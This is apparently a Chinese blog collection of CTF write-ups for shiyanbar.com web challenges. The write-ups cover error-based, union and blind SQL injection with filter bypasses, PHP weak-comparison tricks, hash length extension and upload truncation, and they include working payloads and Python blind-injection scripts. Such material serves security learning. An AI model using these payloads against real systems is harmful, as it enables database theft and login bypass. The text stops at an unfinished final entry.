0Xabc
0Xabc

ctf实验吧

台登陆

格式:flag:{xxx}

解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php

注释里有源码,绕过就行

md5注入,

$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";

md5($password,true)将MD5值转化为了十六进制
思路比较明确,当md5后的hex转换成字符串后,如果包含 ‘or’ 这样的字符串,那整个sql变成

SELECT * FROM admin WHERE pass = ''or'6'

提供一个字符串:ffifdyop

参考https://blog.csdn.net/qq_31481187/article/details/59727015

 

加了料的报错注入

flag格式:flag{xxx}

解题链接: http://ctf5.shiyanbar.com/web/baocuo/index.php

右键源码得到

 username的注入点:

                                (),会提醒User name unknow error.

                                -#:=被过滤

                                floor函数被过滤,其他报错函数正常

password的注入点:

                               -#:=被过滤

                              只有exp和name_const正常,其他报错函数被过滤,

那就有两种思路:

1,password处既可以用(),又可以用exp函数,具备了报错注入的条件。可以利用exp报错注入得到flag

2,在username处可以用报错函数,()被过滤。在password处可以用(),报错函数被过滤。sql注入里有一种就叫http分割注入,在不同的参数之间进行分割,到了数据库执行查询时再合并语句.出题人的意图就是左边不能出现括号,右边不能出现报错函数名.

payload:

username=' or updatexml/*&password=*/(1,concat(0x3a,(select user())),1) or '
这里username最后为 /* 而password最前面为*/  在拼接的时候就实现了/* */注释功能.

先试出一些waf:
substr  mid  left right union limit like

由于不能等号、like,于是借用regexp或者in代替等号,这里给的payload借用了regexp

第一种思路:

exp函数的报错公式select exp(~(select*from(select user())x)),select user()替换为相应的报错语句,

exp函数的用法解析参考:http://netsecurity.51cto.com/art/201508/489529.htm

报表名:

username=' or'1&password='or (select exp(~(select*from(select group_concat(table_name) from information_schema.tables where table_schema regexp database())x)))  or'

得到
DOUBLE value is out of range in 'exp(~((select 'ffll44jj,users' from dual)))'

报列名:

username=' or'1&password='or (select exp(~(select*from(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj')x)))  or'

得到
DOUBLE value is out of range in 'exp(~((select 'value' from dual)))'

也可以用in

username=' or'1&password='or (select exp(~(select*from(select group_concat(column_name) from information_schema.columns where table_name in('ffll44jj'))x)))  or'

报内容:

username=' or'1&password='or (select exp(~(select*from(select value from ffll44jj)x)))  or'

得到flag

                
第二种思路:

select database(); #查选数据库 
select group_concat(schema_name) from information_schema.schemata;#查询数据库
select schema_name from information_schema.schemata limit 0,1  #查询数据库
select group_concat(table_name) from information_schema.tables where table_schema=database();#查询表
select table_name from information_schema.tables where table_schema=database() limit 0,1; #查询表 
select column_name from information_schema.columns where table_name='users' limit 0,1; #查询列

报错函数updataxml的公式:http://www.******.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(select database()),0x7e),1),select database()换成报错语句即可

报表名:

username=' or updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),0x7e),1) or'

得到
XPATH syntax error: '~ffll44jj,users~'

报列名:

username=' or updatexml/*&password=*/(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'),0x7e),1) or'

得到
XPATH syntax error: '~value~'

报内容:

username=' or updatexml/*&password=*/(1,concat(0x7e,(select value from ffll44jj),0x7e),1) or'

得到flag

参考:http://www.shiyanbar.com/ctf/writeup/4869

简单的sql注入

/*!关键字*/就可以绕过

报库名

' /*!union*/ /*!select*/ /*!schema_name*/ /*!from*/ /*!information_schema.schemata*/ /*!where*/ ''='

得到

ID: ' /*!union*/ /*!select*/ /*!schema_name*/ /*!from*/ /*!information_schema.schemata*/ /*!where*/ ''='
name: information_schema
ID: ' /*!union*/ /*!select*/ /*!schema_name*/ /*!from*/ /*!information_schema.schemata*/ /*!where*/ ''='
name: test
ID: ' /*!union*/ /*!select*/ /*!schema_name*/ /*!from*/ /*!information_schema.schemata*/ /*!where*/ ''='
name: web1

报表名,

坑人作者过滤了关键词table_schema,不过还好双写可以绕过。

' /*!union*/ /*!select*/ /*!table_name*/ /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schtable_schemaema*/ = 'web1

得到

ID: ' /*!union*/ /*!select*/ /*!table_name*/ /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/ = 'web1
name: flag
ID: ' /*!union*/ /*!select*/ /*!table_name*/ /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/ = 'web1
name: web_1

报列名,

作者又过滤了和information_schema.columns,都是双写绕过。过滤column_name导致卡了好一会,因为过滤information_schema.columns是可以通过响应near 'from*/ /*!*/ /*!where*/ /*!table_name*/ = 'flag''很容易看出来的.而双写information_schema.columns后的响应near 'from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name*/ = 'flag''却需要对sql语言有一定的了解才知道错误出在column_name被过滤了,真正执行的查询语句是' /*!union*/ /*!select*/  /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name*/ = 'flag,

payload:' /*!union*/ /*!select*/ /*!column_nacolumn_nameme*/ /*!from*/ /*!information_scheminformation_schema.columnsa.columns*/ /*!where*/ /*!table_name*/ = 'flag

得到

ID: ' /*!union*/ /*!select*/ /*!column_name*/ /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name*/ = 'flag
name: flag
ID: ' /*!union*/ /*!select*/ /*!column_name*/ /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name*/ = 'flag
name: id

最后报内容

' /*!union*/ /*!select*/ /*!flag*/ /*!from*/ /*!flag*/ /*!where*/ ''='

得到flag

简单的sql注入之2

就是在简单的sql注入的基础上增加了对空格的过滤,用/**/即可绕过

简单的sql注入之3

就是一个报错注入,试了一下过滤了floor,updatexml,extractvalue这三个报错函数,用加了料的报错注入

介绍的exp函数即可。

报表名

'or (select exp(~(select*from(select group_concat(table_name) from information_schema.tables where table_schema regexp database())x)))  or'

得到

DOUBLE value is out of range in 'exp(~((select 'flag,web_1' from dual)))'

报列名

'or (select exp(~(select*from(select group_concat(column_name) from information_schema.columns where table_name regexp 'flag')x)))  or'

得到

DOUBLE value is out of range in 'exp(~((select 'flag,id' from dual)))'

报内容

'or (select exp(~(select*from(select flag from flag)x)))  or'

得到flag

因缺思汀的绕过

flag格式 CTF{}

解题链接: http://ctf5.shiyanbar.com/web/pcat/index.php

源码审计题,查看了一下源码,大致逻辑就是: 先对post的数据进行过滤,过滤了一些关键词,然后用$uname组建sql语句查询,如果查询的数据只有一条,就用'=='比较post的密码和查询到的密码是否相等,相等返回flag
先用uname=admin&pwd=1试试,
返回  一颗赛艇!
通过源码,知道说明并不存在admin这个用户,
既然不知道用户名,那就只能想办法绕过,这里是用uname=1'||1 limit 1#&pwd=1,返回  亦可赛艇!
组合后的sql语句是:SELECT * FROM interest WHERE uname = '1'||1 limit 1#',

where 1返回所有数据,where 1 limit 1返回一条数据,#把多余的'注释掉,

uname=1'||1 limit 1 offset 1#&pwd=1 返回 亦可赛艇!
uname=1'||1 limit 1 offset 2#&pwd=1 返回  一颗赛艇!
说明只有两个用户。
接下来就是绕过pwd的比较,这里是用uname=1' || 1 group by pwd with rollup limit 1 offset 2#&pwd=绕过,

where 1返回所有数据,where 1 group by pwd ,对where 1得到的结果按pwd分组后返回,where 1 group by pwd with rollup 对where 1 group by pwd得到的结果再增加一行统计结果,关于with rollup见:https://blog.csdn.net/jiangnan2014/article/details/17229713

因为是按pwd分组的,所以增加的那一行的pwd为NULL,即类似这样:

+-------+-------+ 
| uname | pwd | 
+-------+-------+
| usr1 | ***** | 
| usr2 | ***** | 
| usr2 | NULL | 
+-------+-------+

然后where 1 group by pwd with rollup limit 1 offset 2是对where 1 group by pwd with rollup得到的结果取第三行,

最后看这里$key['pwd'] == $_POST['pwd']用的是 ==,根据弱类型,NULL和空字符串是相等的,这就是为何我们不给pwd穿参的原因

参考:http://www.shiyanbar.com/ctf/writeup/1208

 

认真一点!

一直都很认真的

解题链接: http://ctf5.shiyanbar.com/web/earnest/index.php

输入0显示you are not in

输入1 显示you are in

测试单字符waf得到#%,;^|

测试敏感字符得到sustr,union,and

输入0' or '1'='1显示sql detected.是什么被过滤了呐,单独的空格,or,',都不会引起sql detected,那就只能一点一点排除测试,最后发现是因为1 1这种格式被过滤了,那就不用空格,(空格的绕过:用双空格/制表符代替尝试,用/**/当做空格,用括号包起来进行,用回车代替空格,反引号`的使用.)     /**/失败了(最后证明'*'会被替换为空),用制表符是可以的,用回车是可以的,会返回you are in.因为题目的输入框是不能输入回车和tab键的,所以要在bp里修改请求

也就是输入0'%0aor%0a'1'='1,它会返回you are in.

           输入0'%0aor%0a'1'='2,它会返回you are not in.

那么我想用利用盲注来获取数据,为了方便盲注,我写了上面这两个payload的等价式:(为了方便观看,这里空格还是写成空格,真正提交请求的时候需要替换成回车.)

正常来说,上面这个payload应该返回you are in.下面这个返回you are not in.

但实际上两个payload都返回you are not in.

0' or '1'='1和0' or 1=1 or '1'='2两个逻辑上相等的payload居然有不同的结果..两个逻辑上相等的payload都被成功接收了,返回不同的结果。那就是它们的逻辑并没有被完全接受,换句话说就是它们的部分字符被更改了,导致查询语句真正接收到的并不是逻辑相同的语句.

测试发现是因为or被替换成空.需要用oorr代替or.

就是用回车去替换空格,用oorr替换or,利用

0' or 1=1 or '1'='2

0' or 1=2 or '1'='2

的响应不同来进行盲注.

报表名:

import requests
#url,range,id,data
def payload(rawstr):
    newstr=rawstr.replace(' ',chr(0x0a)).replace('or','oorr')
    return newstr
url=r'http://ctf5.shiyanbar.com/web/earnest/index.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz@'
for i in range(1,20):
    for j in dic:
        id="2' or ord((select mid(group_concat(table_name separator '@') from {0} for 1) from information_schema.tables where table_schema=database() limit 1))={1} or '1'='2".format(i,ord(j))#我觉得加一个limit 1比较好,虽然不加也爆出了表名
        data={
            'id':payload(id)
        }
        s=requests.post(url=url,data=data)
        content=s.content
        length=len(content)
        if  length<692:
            string+=j
            break
    print(string)

报列名:

import requests
#url,range,id,data
def payload(rawstr):
    newstr=rawstr.replace(' ',chr(0x0a)).replace('or','oorr')
    return newstr
url=r'http://ctf5.shiyanbar.com/web/earnest/index.php'
string=''
dic='@$.0123456789abcdefghijklmnopqrstuvwxyzLG'#dic=string.digits+string.ascii_letters+'!_{}@~.'
for i in range(1,20):
    for j in dic:
        id="2' or ord((select mid(group_concat(column_name separator '@') from {0} for 1) from information_schema.columns where table_name='fiag' limit 1))={1} or '1'='2".format(i,ord(j))#limit 1似乎不是必须的
        data={
            'id':payload(id)
        }
        s=requests.post(url=url,data=data)
        content=s.content
        if  'You are in' in str(content):
            string+=j
            break
    print(string)

报内容:

import requests
import string
#url,range,id,data
def payload(rawstr):
    newstr=rawstr.replace(' ',chr(0x0a)).replace('or','oorr')
    return newstr
url=r'http://ctf5.shiyanbar.com/web/earnest/index.php'
string1=''
dic=string.digits+string.ascii_letters+'!_{}@~ .'
for i in range(1,20):
    for j in dic:
        id="2' or ord((select mid(group_concat(fL$4G separator '@') from {0} for 1) from fiag))={1} or '1'='2".format(i,ord(j))
        data={
            'id':payload(id)
        }
        s=requests.post(url=url,data=data)
        content=s.content
        if  'You are in' in str(content):
            string1+=j
            break
    print(string1)

你真的会PHP吗?

解题链接: http://ctf5.shiyanbar.com/web/PHP/index.php

源码审计,绕过一些php函数.

post的数据要含有number变量,number变量要满足以下三个条件:

1.在is_numeric() 看起来,必须不是数字

2.$_POST['number']必须等于strval(intval($_POST['number'])),其实就是说number必须是纯数字.

3.intval($_POST["number"])必须等于intval(strrev($_POST["number"])),并且is_palindrome_number($req["number"])要返回false.其实就是说用intval和strrev判断是回文,而用is_palindrome_number()判断却不是回文.

注:is_palindrome_number()是作者自己写的判断回文的函数.

 

is_numeric()函数是判断变量是否是数字或者数字字符串,不仅检查10进制,16进制也可以.
is_numeric()对于空字符%00,不论%00放在数字前后,都会返回false,对于%20,只有放在数字后才会返回false.

Intval函数获取变量整数数值
Intval最大的值取决于操作系统。 32 位系统最大带符号的 integer 范围是 -2147483648 到 2147483647。举例,在这样的系统上, intval(‘1000000000000’) 会返回 2147483647。64 位系统上,最大带符号的 integer 值是 9223372036854775807。

这个有个应用就是在判断数值是不是回文上,如果参数为2147483647,那么当它反过来,由于超出了限制,所以依然等于2147483647。即为回文

所以在bp里修改请求为number=2147483647%20即可.

登陆一下好吗??

不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!

flag格式:ctf{xxxx}

解题链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

万能密码:username=kkk'='&password=kkk'='

select * from user where username='用户名' and password='密码'

---->>select * from user where username='kkk'='' and password='kkk'=''

或者:

通过构造username=0爆出全部数据

这里我们要知道,除了开头是非零数的字符串,其他字符串化成整型都为0,字符串=0 为真。

当所有username里没有开头是非零数的字符串,username=0相当于查全部数据.

username=\&password=^'aaa

构成的语句是 select * from user where username = ' \' and password = '^'aaa'

其中反斜杠把后面的单引号转义掉了,所以' \' and password = '就是一串字符串,'aaa'也是一串字符串,字符串都为0,0⊕0=0,又构造出username=0

参考:http://www.shiyanbar.com/ctf/writeup/6008

 

who are you?

我要把攻击我的人都记录db中去!

解题链接: http://ctf5.shiyanbar.com/web/wonderkun/index.php

进去发现是记录ip,一般有CLIENT-IP,X-FORWARDED-FOR,REMOTE_ADDR
通过修改HTTP头中发现这里是获取X-FORWARDED-FOR,

修改X-Forwarded-For头为,1' and sleep(3) and '1'='1

进程比之前慢了三秒左右,这就很显然是个基于时间的盲注,试试比较普遍的,1' and if(1,sleep(3),sleep(0)) and '1'='1

发现过滤了',',不过没关系,试试另一个不用逗号的,1' and (select case when 1 then sleep(3) else sleep(0) end) and 'a'='a

成功延时,那就写个脚本

报表名:

import requests
url=r'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz@_'
for i in range(1,33):
    for j in dic:
        xff="127' and (select case when (ord((select mid(group_concat(table_name separator '@') from {0} for 1) from information_schema.tables where table_schema=database() limit 1)) = {1}) then sleep(3) else sleep(0) end) and 'a'='a".format(i,ord(j))
        headers={
            "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "http://www.shiyanbar.com/ctf/1941",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Cache-Control": "max-age=0",
            "X-Forwarded-For": xff
        }
        s=requests.post(url=url,headers=headers)
        sec=s.elapsed.seconds
        if sec > 3:
            string+=j
            break
    print (string)

报列名:

import requests
url=r'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz@_`~!@#$%^&*()_+-=[]{};\:\'",/<>?/-+.'
for i in range(1,33):
    for j in dic:
        xff="127' and (select case when (ord((select mid(group_concat(column_name separator '@') from {0} for 1) from information_schema.columns where table_name='flag' limit 1)) = {1}) then sleep(5) else sleep(0) end) and 'a'='a".format(i,ord(j))
        headers={
            "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "http://www.shiyanbar.com/ctf/1941",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Cache-Control": "max-age=0",
            "X-Forwarded-For": xff
        }
        s=requests.post(url=url,headers=headers)
        sec=s.elapsed.seconds
        if sec > 5:
            string+=j
            break
    print (string)

报内容

import requests
url=r'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
string=''
dic='0123456789abcdefghijklmnopqrstuvwxyz@_`~!@#$%^&*()_+-=[]{};\:\'",/<>?/-+.'
for i in range(1,38):
    for j in dic:
        xff="127' and (select case when (ord((select mid(flag from {0} for 1) from flag)) = {1}) then sleep(10) else sleep(0) end) and 'a'='a".format(i,ord(j))
        headers={
            "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "http://www.shiyanbar.com/ctf/1941",
            "Cookie": "PHPSESSID=urb8502qlulq604377sopeo0a6",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Cache-Control": "max-age=0",
            "X-Forwarded-For": xff
        }
        s=requests.post(url=url,headers=headers)
        sec=s.elapsed.seconds
        if sec > 10:
            string+=j
            break
    print (string)

就是答案要再加个ctf{},题目里没说.

天下武功唯快不破

看看响应头

格式:CTF{ }

解题链接: http://ctf5.shiyanbar.com/web/10/10.php

看看响应头得到 FLAG:UDBTVF9USElTX1QwX0NINE5HRV9GTDRHOlBNVE1XVUZHUQ==

base64解码得到:P0ST_THIS_T0_CH4NGE_FL4G:PMTMWUFGQ,    post这个到CH4NGE_FL4G,

CH4NGE_FL4G是什么我不知道,一直到解决这道题我也不知道.

按照惯例:源码,查看元素,bp看包,御剑扫描.

在查看元素时得到

用参数key,post你所发现的,这就很明显了,大概就是参数名是key,值是FLAG解码后的东西。写个脚本:

import requests
import base64
url="http://ctf5.shiyanbar.com/web/10/10.php"
s=requests.Session()
flag=s.get(url).headers['FLAG']
flag=base64.b64decode(flag)
flag=str(flag)
flag=flag.split(':')[1]#因为用':'切片后,得到的数据类似G5xo0UJpS'这种形式,所以再用单引号切片,得到G5xo0UJpS
flag=flag.split('\'')[0]
data={'key':flag}
reps=s.post(url,data=data)
print(reps.content.decode('utf-8'))

让我进去

相信你一定能拿到想要的

Hint:你可能希望知道服务器端发生了什么。。

格式:CTF{}

解题链接: http://ctf5.shiyanbar.com/web/kzhan.php

大概就是查看源码,查看元素,bp看包没什么收获,

只能再看看题,看看有什么提示,

ctf实验吧_第1张图片

 

题目里说:If you have the correct credentials, log in below. If not, please LEAVE.

它是怎么知道我有没有正确的证书呐,又看了一遍请求头,响应头.发现了一个异于其他题的请求头:

cookie:source=0,然后就把0改为1试了下,得到了源码

$flag = "XXXXXXXXXXXXXXXXXXXXXXX";
$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security!

$username = $_POST["username"];
$password = $_POST["password"];

if (!empty($_COOKIE["getmein"])) {
    if (urldecode($username) === "admin" && urldecode($password) != "admin") {
        if ($COOKIE["getmein"] === md5($secret . urldecode($username . $password))) {
            echo "Congratulations! You are a registered user.\n";
            die ("The flag is ". $flag);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("You are not an admin! LEAVE.");
    }
}

setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));

if (empty($_COOKIE["source"])) {
    setcookie("source", 0, time() + (60 * 60 * 24 * 7));
}
else {
    if ($_COOKIE["source"] != 0) {
        echo ""; // This source code is outputted here
    }
}

关键的部分大概就是:

if (!empty($_COOKIE["getmein"]))
{
    if (urldecode($username) === "admin" && urldecode($password) != "admin")
    {
        if ($COOKIE["getmein"] === md5($secret . urldecode($username . $password)))
        {
            echo "Congratulations! You are a registered user.\n";
            die ("The flag is ". $flag);
        }
        else
        {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("You are not an admin! LEAVE.");
    }
}
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));

 

$secret是未知的,md5($secret."adminadmin")是已知的,在$password不等于"admin"的前提下要求md5($secret . urldecode("admin" . $password)))等于$COOKIE["getmein"]的值,难点在哪呐,我只知道password等于"admin"的情况下,md5加密的结果.password等于其他值的情况下因为$secret是未知的,所以加密后的结果是不知道的,这里利用了Hash长度扩展攻击

深入理解hash长度扩展攻击(sha1为例) http://www.freebuf.com/articles/web/69264.html

科普哈希长度扩展攻击(Hash Length Extension Attacks) http://www.freebuf.com/articles/web/31756.html

讲解的最详细的应该是

《白帽子讲web安全》中的“Understanding MD5 Length Extension Attack”一节。

利用的时候需要在主动地控制md5操作流程中的一些输入值,所以需要清楚md5的操作流程,参考:

MD5算法详述及python实现 http://blog.csdn.net/adidala/article/details/28677393

这里也有现成的工具可以使用:

哈希长度扩展攻击的简介以及HashPump安装使用方法  http://www.cnblogs.com/pcat/p/5478509.html

哈希长度扩展攻击(Hash Length Extension Attack)利用工具hexpand安装使用方法 http://www.cnblogs.com/pcat/p/7668989.html

 

拐弯抹角

如何欺骗服务器,才能拿到Flag?

格式:CTF{}

解题链接: http://ctf5.shiyanbar.com/indirection/

这道题打开链接后,就看到高亮的源码,简单看了理解下,就是分7个步骤判断URL是否满足条件,如果不满足就把$flag弄掉(后面的echo $flag你就看不到你想要的),这题比较温馨的是当你不满足条件就会看到Not Pass(作者蛮用心的)。
    如果是正常访问,$URL = $_SERVER['REQUEST_URI']; 这里$URL一般会得到/indirection/或者/indirection/index.php,这里的$_SERVER['REQUEST_URI']只会原封不动的显示网址的字符串(不会像$_SERVER['PHP_SELF']会对网址进行一次urldecode操作),所以要转义不太可能。通篇也没出现echo $URL;要注入也不太可能。
    于是,冷静分析下7个步骤,发现要过的话,需要满足不能出现./、\、大写或者其他符号、//、p.,而且要求末尾是/index.php,这6个步骤对于/indirection/index.php都可以满足,但是最后一条又告知不能等于/indirection/index.php,顿时就被泼了冷水- -。
    作为一个非Web狗表示压力大,中间的苦逼过程就不提了,我也是在本地构建php尝试写注入语句时发现一个php路径解析的问题,/test.php/pcat.html也是能正常访问/test.php,自我猜想就是服务器解析到.php后就把后面的/pcat.html当作参数处理。(>^ω^<)看到这里,你们可以想到了吧,第5步步骤只要求末尾是/index.php,那么我们构建/indirection/index.php/index.php不就ok?于是7个步骤都能通过,就可以得到flag。

    科普君:这种其实就是伪静态技术(pseudo-static),又名URL重写(URL rewriting)。举个最简单的应用,例如你原本想弄的是index.php?id=123,但你想隐藏其真实的文件路径,你通过URL重写技术,可以达到访问test/123.html而实际上在访问index.php?id=123

转:http://www.shiyanbar.com/ctf/writeup/545

 

天网管理系统

天网你敢来挑战嘛

格式:ctf{ }

解题链接: http://ctf5.shiyanbar.com/10/web1/

在源码里找到:

 "0e123456"=="0e456789"相互比较的时候,会将0e这类字符串识别为科学技术法的数字,0乘以10的无论多少次方都是0,所以相等

  • 0e开头的md5和原值:

  • s878926199a

  • 0e545993274517709034328855841020

  • s155964671a

  • 0e342768416822451524974117254469

所以username=s878926199a,得到/user.php?fame=hjkleffifer,访问得到

$unserialize_str = $_POST['password'];
     $data_unserialize = unserialize($unserialize_str);
     if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???')
     {
       print_r($flag);
     }
伟大的科学家php方言道:成也布尔,败也布尔。
回去吧骚年

利用bool类型的true跟任意字符串可以弱类型相等,即


#得到OK[Finished in 0.3s]

所以序列化数组:array("user"=>true,"pass"=>true)

true,"pass"=>true);
$test2 = '';
$test2=serialize($test);
echo $test2;
?>
#得到a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

提交password=a:2:{s:4:"user";b:1;s:4:"pass";b:1;}即可.

忘记密码了

找回密码

格式:SimCTF{ }

解题链接: http://ctf5.shiyanbar.com/10/upload/

查看源码,查看元素,得到一点信息:管理员邮箱:[email protected].编辑器是vim
直接在输入框提交[email protected],得到"邮件发到管理员邮箱了,你看不到的"
随便提交一个东西例如kk,得到"你邮箱收到的重置密码链接为 ./[email protected]&check=???????"
访问http://ctf5.shiyanbar.com/10/upload/[email protected]&check=???????,发现重定向到step1.php了,
那就用bp拦截,这样就能停留在step2了,但是此时的输入框如下:ctf实验吧_第2张图片

两个输入位,在第一个输入框提交kk,第二个输入框随便填.提示"you are not an admin",那就在第一个提交[email protected],得到fail,应该是因为第二个输入框token的值不对,
但我并没有方法能得到管理员的token.查看其他人的wp.

通过step1.php,处理程序我们知道是step2.php,最后是submit.php负责校验。

vim编辑器的特点是,可能产生临时文件,对于submit.php,产生的临时文件是 .submit.php.swp。

我们打开http://ctf5.shiyanbar.com/10/upload/.submit.php.swp,可以看到最后判断逻辑的源代码。

注意到token就是0,并且还要绕过长度限制(要求长度为10)。

所以,访问[email protected]&token=0000000000

即可看到flag

那这道题考察的就是这一点:vim编辑器会产生临时文件,对于submit.php,产生的临时文件是 .submit.php.swp。

可以访问得到submit.php的源码

Once More

啊拉?又是php审计。已经想吐了。

hint:ereg()函数有漏洞哩;从小老师就说要用科学的方法来算数。

格式:CTF{}

解题链接: http://ctf5.shiyanbar.com/web/more.php

源码如下:

if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
    {
        echo '

You password must be alphanumeric

';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('

*-* have not been found

');
        }
    }
    else
    {
        echo '

Invalid password

';
    }
}
?>

ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false

ereg的漏洞大概如下:

ereg函数漏洞:00截断

ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE

字符串对比解析
在这里如果 $_GET[‘password’]为数组,则返回值为NULL
如果为123 || asd || 12as || 123%00&&&**,则返回值为true
其余为false

正常情况下这个式子是不可能满足的:if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)

在这里是用科学技术法绕过,即1e9,这样既保证了长度小于8,数值也大于9999999

所以提交1e9%00*-*即可得到flag

Guess Next Session

写个算法没准就算出来了,23333

hint:你确定你有认真看判断条件?

格式:CTF{}

解题链接: http://ctf5.shiyanbar.com/web/Session.php

这个需要知道session变量的一些机制。简单的说就是,在客户端访问之前,如果该客户端以前没访问过,服务器就会给个phpsessid,同时在服务器上生成一个对应的文件,用来存储session变量.

源码中最重要的是这一行if ($_GET['password'] == $_SESSION['password'])

 为了绕过它,我们用bp抓包,提交password=,并且去掉我们的cookie.这样服务器认为我们是第一次访问该网站,$_SESSION['password']就是空.也就等于了同样为空的password

总之这题考查了session的机制

FALSE

PHP代码审计

hint:sha1函数你有认真了解过吗?听说也有人用md5碰撞o(╯□╰)o

格式:CTF{}

解题链接: http://ctf5.shiyanbar.com/web/false.php

$_GET['name'] != $_GET['password']
sha1($_GET['name']) === sha1($_GET['password'])
#要求满足上述条件

md5 和 sha1 无法处理数组,返回 NULL,将变量namepassword加个[]即可

即:name[]=1&password[]=2

上传绕过

bypass the upload

格式:flag{}

解题链接: http://ctf5.shiyanbar.com/web/upload

请看:https://blog.csdn.net/zpy1998zpy/article/details/80545408#comments

启发:除了文件名,还能在文件保存路径处进行0x00截断.

这样,文件名1.jpg可以绕过检查,
文件保存时又是/uploads/1.php 1.jpg(空格代表0x00截断),对于服务器来说就是:/uploads/1.php,既绕过了对上传的文件名的检查,又在保存时保存成了想要的文件.

NSCTF web200

密文:a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws

格式:flag:{}

解题链接: http://ctf5.shiyanbar.com/web/web200.jpg

打开是这个

就是写个解密函数把密文解出来就行:

本地服务器,传参key=a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws

即可

程序逻辑问题

绕过

解题链接: http://ctf5.shiyanbar.com/web/5/index.php

查看源码得到index.txt,访问得到源码.

看了源码以为是报错注入,就注入得到了用户名admin和密码111,但登录失败。仔细看看源码,发现

$pass = md5($_POST[pass]); if (($row[pw]) && (!strcasecmp($pass, $row[pw])))

也就是说我输入pass=111,

最后比较的是strcasecmp(md5('111'), '111'),自然是不可能相等的,尝试了strcasecmp()函数的漏洞,即比较数组和字符串时会返回0,即认为相等,传入user=admin&pass[]=1,然而没用.大概是因为pass[]经过了md5()就不再是个数组了.

最后发现能通过union控制$row[pw]的结果,即user=' union select 'cb42e130d1471239a27fca6228094f0e&pass=kkk(cb42e130d1471239a27fca6228094f0e是kkkmd5加密后的结果)

$sql = "select pw from php where user='$user'";

这样查询语句就是select pw from php where user='' union select 'cb42e130d1471239a27fca6228094f0e'

union的前一个查询查不到东西,后一个返回cb42e130d1471239a27fca6228094f0e,原理:https://blog.csdn.net/u010104750/article/details/51141221

然后strcasecmp($pass, $row[pw])就是strcasecmp(md5('kkk'), 'cb42e130d1471239a27fca6228094f0e'),返回0,拿到flag

总结就是可以通过select 1 控制sql返回的结果

PHP大法

注意备份文件

解题链接: http://ctf5.shiyanbar.com/DUTCTF/index.php

源码:

not allowed!
");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "
Access granted!
";
  echo "
flag: *****************} 
";
}
?>

看到eregi以为是00截断,试了id=%00hackerDJ,发现不行,仔细看看比平常多了一行

$_GET[id] = urldecode($_GET[id]);

又进行了一次urldecode解码,那就很明确了,把hackerDJ编码两次就绕过了.

id=%25%36%38%25%36%31%25%36%33%25%36%42%25%36%35%25%37%32%25%34%34%25%34%41即可

这个看起来有点简单!

很明显。过年过节不送礼,送礼就送这个

格式:

